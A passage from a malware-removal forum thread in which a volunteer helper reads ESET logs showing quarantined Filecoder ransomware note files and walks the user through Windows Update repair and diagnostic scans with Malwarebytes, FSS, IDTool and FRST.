sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sk-sk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sk-sk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sl-si\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sl-si\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sr-latn-rs\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sr-latn-rs\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sv-se\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sv-se\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\tr-tr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\tr-tr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\uk-ua\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\uk-ua\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-cn\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-cn\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-hk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-hk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-tw\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-tw\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\cs-cz\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\cs-cz\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\da-dk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\da-dk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\de-de\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\de-de\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\el-gr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\el-gr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\en-us\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\en-us\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\es-es\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\es-es\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fi-fi\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fi-fi\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\Fonts\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\Fonts\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fr-fr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fr-fr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\hu-hu\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\hu-hu\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\it-it\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\it-it\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ja-jp\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ja-jp\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ko-kr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ko-kr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nb-no\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nb-no\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nl-nl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nl-nl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pl-pl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pl-pl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-br\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-br\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-pt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-pt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ru-ru\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ru-ru\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\sv-se\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\sv-se\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\tr-tr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\tr-tr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-cn\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-cn\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-hk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-hk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-tw\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-tw\how_decrypt.html"
 

 


  • 0

Advertisements


#11
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello again, xander291190.

I've noticed that you ran both MBAM and ESET with default settings and that you stopped MBAM from scanning. It is really important that the procedures are performed the way given. Please perform instructions as they are.

ESET has found some files that seem to be remnants of Filecoder ransomware. It's symptoms are that your files get encrypted and you don't have access to them anymore. Have you had it removed earlier?

Also, perform the following instructions.

Step #1
Services edit
  • Click Start>type services.msc in the search box and click Enter. A window will appear.
  • Search for Windows Update, then right-click it and choose Properties.
  • In a window that appears, change the Startup type to Automatic.
  • Click OK and restart your system.
 
Step #2
cnUOkXS.png Farbar Service Scanner
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
Step #3
JHlUMFt.png Malwarebytes Anti-Malware
  • Launch Malwarebytes Anti-Malware
  • In Database version section, click Update Now
  • Once the update is done, click Settings>Detection and Protection
  • Make sure that all three boxes under Detection Options are checked
    vG7pLOy.png
  • Go back to Dashboard and click the big, green Scan Now button.
  • Wait for Malwarebytes Anti-Malware to finish the scan. DO NOT CANCEL IT!
  • If the program will detect anything, click Remove Selected. The program might want to reboot the system. Allow it it wants to.
  • Once the deletion is done (or after reboot), go to History, select Application Logs and click the latest Scan Log.
  • Click Export, then click Copy to Clipboard.
  • Paste (CTRL+V) the log into your next reply.
 
EOEdyWG.png Things that should appear in your next post:
  • Answer to my question about Filecoder
  • FSS.txt log content
  • Malwarebytes Anti-Malware log content

  • 0

#12
xander291190

xander291190

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Hi Nevan,

 

I'm not really sure what Filecoder is if i'm honest. If it's a program or some sort of file that was on my computer, I wasn't aware of it. Maybe i deleted it without really knowing what it was, sorry I can't really answer the question very well, I don't really recall the file.

 

Also my apologies, I didn't intentionally cancel the MalwareBytes scan, I left it running while i was away from the laptop, so maybe it cancelled by accident I'm not sure.

 

Here's the logs:

 

MalwareBytes:

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/09/2015
Scan Time: 9:09 AM
Logfile: MalwareBytes.txt
Administrator: Yes
 
Version: 2.1.8.1057
Malware Database: v2015.09.07.04
Rootkit Database: v2015.08.16.01
License: Trial
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: user
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 339256
Time Elapsed: 29 min, 36 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 08-09-2015 at 10:08:56
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is OK.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****
 
(end)
 
FSS:
 
Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 08-09-2015 at 10:08:56
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is OK.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****

Edited by xander291190, 07 September 2015 - 06:16 PM.

  • 0

#13
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello again, xander291190.

It looks like Windows Update is still not running. We have to keep trying to repair it.

Please perform the instructions below.

Step #1
Windows Update fix

Download Windows Update Automated Troubleshooter to your Desktop and run it. A window will appear.
Click Next and wait for the program to automatically detect and fix any problems found.
Once the fixing is done, restart your system.

 
Step #2
cnUOkXS.png Farbar Service Scanner
  • Download FSS.exe to your desktop.
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
Step #3
IDToolbyNathan.pngScan with IDTool

Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.
  • Enter the IDTool directory, right-click on IDToolbyNathan.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • IDTool needs Micorsoft .NET Framework environment to work properly, so if prompted to download & install it please agree.
  • Wait patiently until the cool will collect necessary data.
  • Once the main console is loaded, please press Rescan Computer and Generate a New Report.
  • When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
  • Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.
Please include that in your next reply.

 
EOEdyWG.png Things that should appear in your next post:
  • FSS.txt log content
  • IDTool log content

  • 0

#14
xander291190

xander291190

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Hi Nevan,

 

Quick question, I'm not sure the IDTool is working properly for me. I've run as administrator, which is fine, it didn't prompt me to download the .NET framework. I left it for almost an hour thinking it was maybe doing something in the background, but cam back and it was just the same empty screen.

 

I then tried to download the .NET framework myself from the Microsoft website, but when i went to install it said I already had it and installation wasn't necessary.

 

Tried the tool again and left it, it did the same thing with nothing showing on the screen. I clicked rescan to see if it did anything and nothing happened, just immediately said scan complete and nothing was in the report. Not sure what to do with it from here.

 

Here's the other information you asked for in the meantime:

 

Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 10-09-2015 at 00:09:15
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****

  • 0

#15
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello again, xander.

Don't worry, it looks like everything's fine.

We're almost done. Please perform the following instructions.

Step #1
4rr98tz.pngFRST Scan
  • Right click FRST64.exe on your Desktop and click Run as administrator. When the tool opens click Yes to disclaimer.
  • Make sure that Addition.txt is checked and press the Scan button.
  • It will produce two logs - one called FRST.txt and another one called Addition.txt in the same directory the tool is run from.
  • Select all (CTRL+A) the content of the logs, copy them (CTRL+C) and paste (CTRL+V) them into your next reply.
 
Step #2
bABuPc2.pngSecurity Check

Download Security Check from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.

 
EOEdyWG.png Things that should appear in your next post:
  • FRST.txt log content
  • Addition.txt log content
  • Checkup.txt log content

  • 0






Similar Topics


Also tagged with one or more of these keywords: chrome

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP